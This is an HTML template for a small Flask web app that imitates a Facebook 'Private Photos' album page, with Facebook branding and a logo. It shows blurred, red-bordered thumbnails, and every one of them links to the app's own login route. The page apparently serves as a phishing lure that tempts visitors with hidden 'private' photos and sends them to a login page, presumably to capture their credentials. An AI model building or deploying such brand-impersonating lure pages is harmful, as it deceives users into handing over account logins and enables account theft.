<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="icon" href="{{url_for('static', filename='facebook-logo.png')}}" type="image/x-icon">
    <title>Photo Album | Facebook</title>
    <style>
        *{
            margin: 0;
            padding: 0;
            font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;

        }
        .container header{
            display: flex;
            align-items: center;
            justify-content: center;
            background-color: rgb(84, 84, 238);
            height: 30px;
            justify-content: center;
        }
        .container header p{
            font-size: 20;
            color: white;
            font-weight:600;
        }

.container .warn{
    background-color: rgba(133, 134, 134, 0.514);
    padding: 5px 20px;
    color: rgb(82, 82, 82);
}

.container .images img{
    width: 100px;
    border: 2px solid red;
    height: 100px;
    margin: 10px;
    filter: blur(2px);
}

    </style>
</head>
<body>
    <div class="container">
        <header>
            <p>facebook</p> 
        </header>
         
        <p class="warn">Albums: Private Photos</p> 
         
        <div class="images">
            <!-- <a href="http://www.google.com" target="_blank"> -->
            <a href="{{url_for('login')}}"><img  border="0" align="center"  src="{{url_for('static', filename='1.jpg')}}"/></a>
            <a href="{{url_for('login')}}"><img  border="0" align="center"  src="{{url_for('static', filename='2.jpg')}}"/></a>
            <a href="{{url_for('login')}}"><img  border="0" align="center"  src="{{url_for('static', filename='3.jpg')}}"/></a>
            <a href="{{url_for('login')}}"><img  border="0" align="center"  src="{{url_for('static', filename='4.jpg')}}"/></a>
            <a href="{{url_for('login')}}"><img  border="0" align="center"  src="{{url_for('static', filename='5.jpg')}}"/></a>
            <a href="{{url_for('login')}}"><img  border="0" align="center"  src="{{url_for('static', filename='1.jpg')}}"/></a>
            <a href="{{url_for('login')}}"><img  border="0" align="center"  src="{{url_for('static', filename='2.jpg')}}"/></a>
            <a href="{{url_for('login')}}"><img  border="0" align="center"  src="{{url_for('static', filename='3.jpg')}}"/></a>
            <a href="{{url_for('login')}}"><img  border="0" align="center"  src="{{url_for('static', filename='4.jpg')}}"/></a>
            <a href="{{url_for('login')}}"><img  border="0" align="center"  src="{{url_for('static', filename='5.jpg')}}"/></a>
            <a href="{{url_for('login')}}"><img  border="0" align="center"  src="{{url_for('static', filename='1.jpg')}}"/></a>
            <a href="{{url_for('login')}}"><img  border="0" align="center"  src="{{url_for('static', filename='2.jpg')}}"/></a>
            <a href="{{url_for('login')}}"><img  border="0" align="center"  src="{{url_for('static', filename='3.jpg')}}"/></a>
            <a href="{{url_for('login')}}"><img  border="0" align="center"  src="{{url_for('static', filename='4.jpg')}}"/></a>
            <a href="{{url_for('login')}}"><img  border="0" align="center"  src="{{url_for('static', filename='5.jpg')}}"/></a>
            <a href="{{url_for('login')}}"><img  border="0" align="center"  src="{{url_for('static', filename='1.jpg')}}"/></a>
            <a href="{{url_for('login')}}"><img  border="0" align="center"  src="{{url_for('static', filename='2.jpg')}}"/></a>
            <a href="{{url_for('login')}}"><img  border="0" align="center"  src="{{url_for('static', filename='3.jpg')}}"/></a>
            <a href="{{url_for('login')}}"><img  border="0" align="center"  src="{{url_for('static', filename='4.jpg')}}"/></a>
            <a href="{{url_for('login')}}"><img  border="0" align="center"  src="{{url_for('static', filename='5.jpg')}}"/></a>
            <!-- <a href="http://www.google.com"><img  border="0" align="center"  src="img/2.jpg"/></a>
            <a href="http://www.google.com"><img  border="0" align="center"  src="img/3.jpg"/></a>
            <a href="http://www.google.com"><img  border="0" align="center"  src="img/4.jpg"/></a>
            <a href="http://www.google.com"><img  border="0" align="center"  src="img/5.jpg"/></a>
            <a href="http://www.google.com"><img  border="0" align="center"  src="img/1.jpg"/></a>
            <a href="http://www.google.com"><img  border="0" align="center"  src="img/2.jpg"/></a>
            <a href="http://www.google.com"><img  border="0" align="center"  src="img/3.jpg"/></a>
            <a href="http://www.google.com"><img  border="0" align="center"  src="img/4.jpg"/></a>
            <a href="http://www.google.com"><img  border="0" align="center"  src="img/5.jpg"/></a>
            <a href="http://www.google.com"><img  border="0" align="center"  src="img/1.jpg"/></a>
            <a href="http://www.google.com"><img  border="0" align="center"  src="img/2.jpg"/></a>
            <a href="http://www.google.com"><img  border="0" align="center"  src="img/3.jpg"/></a>
            <a href="http://www.google.com"><img  border="0" align="center"  src="img/4.jpg"/></a>
            <a href="http://www.google.com"><img  border="0" align="center"  src="img/5.jpg"/></a> -->
        </div>
    </div>
</body>
</html>